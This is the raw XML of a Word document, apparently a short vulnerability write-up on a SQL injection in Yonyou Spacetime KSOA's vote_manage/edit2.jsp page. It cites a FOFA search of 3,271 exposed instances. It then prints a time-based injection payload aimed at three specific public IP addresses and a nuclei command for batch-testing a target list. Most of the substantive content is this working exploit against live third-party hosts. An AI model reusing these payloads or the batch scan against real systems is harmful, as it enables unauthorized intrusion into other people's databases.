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7E43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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Pages and FOFA assets: 3,271 entries, app="Yonyou - Spacetime KSOA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261054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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Yonyou Spacetime KSOA is a new-generation product developed under the guidance of the SOA concept. Launched to address the cutting-edge IT requirements of circulation enterprises, it provides a unified IT infrastructure that enables seamless communication between IT systems built by circulation enterprises at different stages. It helps circulation enterprises protect their existing IT investments, simplify IT management, enhance competitiveness, and ensure the achievement of the enterprise’s overall strategic goals and innovative activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDA261">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8D91CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4109085"/>
            <wp:effectExtent l="0" t="0" r="635" b="57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5272405" cy="4109085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEFF90E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4953000" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2301752D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C082645">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A04FC7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Nuclei：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE531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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:65.4pt;width:72.6pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId7" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1468075725" r:id="rId6">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="701459F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Poc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC3C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sqlmap：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C509686">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://101.43.103.137:88/vote_manage/edit2.jsp?Vote_id=';WAITFOR DELAY '0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5B069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="1263015"/>
            <wp:effectExtent l="0" t="0" r="13970" b="190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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1263015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E71F182">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://110.40.177.101:9007/vote_manage/edit2.jsp?Vote_id=';WAITFOR DELAY '0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB5DCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1373505"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1333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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="1373505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D516FFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://111.229.107.89:9089/vote_manage/edit2.jsp?Vote_id=';WAITFOR DELAY '0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31455310">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1270000"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1016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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="1270000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F45A459">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACF9A11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>perform batch verification</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5E918C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nuclei.exe -t yongyou-ksoa-edit2-sql.yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-l subs.txt -stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E67D86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="983615"/>
            <wp:effectExtent l="0" t="0" r="5080" b="698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5267960" cy="98361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9AA4B2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C69AA4B2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="4CD6C9FF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4CD6C9FF"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3"/>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E624AF"/>
    <w:rsid w:val="00AD4CA8"/>
    <w:rsid w:val="01572F42"/>
    <w:rsid w:val="01C225F2"/>
    <w:rsid w:val="031C69F7"/>
    <w:rsid w:val="097D663B"/>
    <w:rsid w:val="0B756CA4"/>
    <w:rsid w:val="0C011C1B"/>
    <w:rsid w:val="0D1220C4"/>
    <w:rsid w:val="0F8013FD"/>
    <w:rsid w:val="0F8F1D7E"/>
    <w:rsid w:val="10583751"/>
    <w:rsid w:val="10AF5D4D"/>
    <w:rsid w:val="151719E8"/>
    <w:rsid w:val="18B565BF"/>
    <w:rsid w:val="1E4C18FC"/>
    <w:rsid w:val="20287055"/>
    <w:rsid w:val="20AA5CE1"/>
    <w:rsid w:val="21841692"/>
    <w:rsid w:val="23483A6E"/>
    <w:rsid w:val="234A53C4"/>
    <w:rsid w:val="24E3792D"/>
    <w:rsid w:val="25D52D09"/>
    <w:rsid w:val="269F5C69"/>
    <w:rsid w:val="27463747"/>
    <w:rsid w:val="2B4D6CC1"/>
    <w:rsid w:val="2C612B4D"/>
    <w:rsid w:val="364D72D5"/>
    <w:rsid w:val="38311E2C"/>
    <w:rsid w:val="393F18AB"/>
    <w:rsid w:val="40132D5E"/>
    <w:rsid w:val="42A25795"/>
    <w:rsid w:val="443865EF"/>
    <w:rsid w:val="47B9522C"/>
    <w:rsid w:val="47DD3C22"/>
    <w:rsid w:val="4F957957"/>
    <w:rsid w:val="50C55553"/>
    <w:rsid w:val="51EA31AE"/>
    <w:rsid w:val="5BD4669C"/>
    <w:rsid w:val="5EA14777"/>
    <w:rsid w:val="656435F2"/>
    <w:rsid w:val="6CDF4E2C"/>
    <w:rsid w:val="6D120A1E"/>
    <w:rsid w:val="6E364222"/>
    <w:rsid w:val="71855536"/>
    <w:rsid w:val="74F2125E"/>
    <w:rsid w:val="77E13575"/>
    <w:rsid w:val="77E624AF"/>
    <w:rsid w:val="7AA17C39"/>
    <w:rsid w:val="7C085390"/>
    <w:rsid w:val="7F8709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keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs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emf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><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182</Words>
  <Characters>497</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>120</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>510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2025-08-26T06:24:00Z</dcterms:created>
  <dc:creator>lq</dc:creator>
  <cp:lastModifiedBy>XED</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-26T09:26:41Z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E7BE57B2D54644628F78CAF778260CC7_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNWM1MWJkNWJiY2Q1NzJmZmRlMThjOTUwZWMxNmFkZjkiLCJ1c2VySWQiOiI0MjI2MjkxOTkifQ==</vt:lpwstr>
  </property>
</Properties>
</file>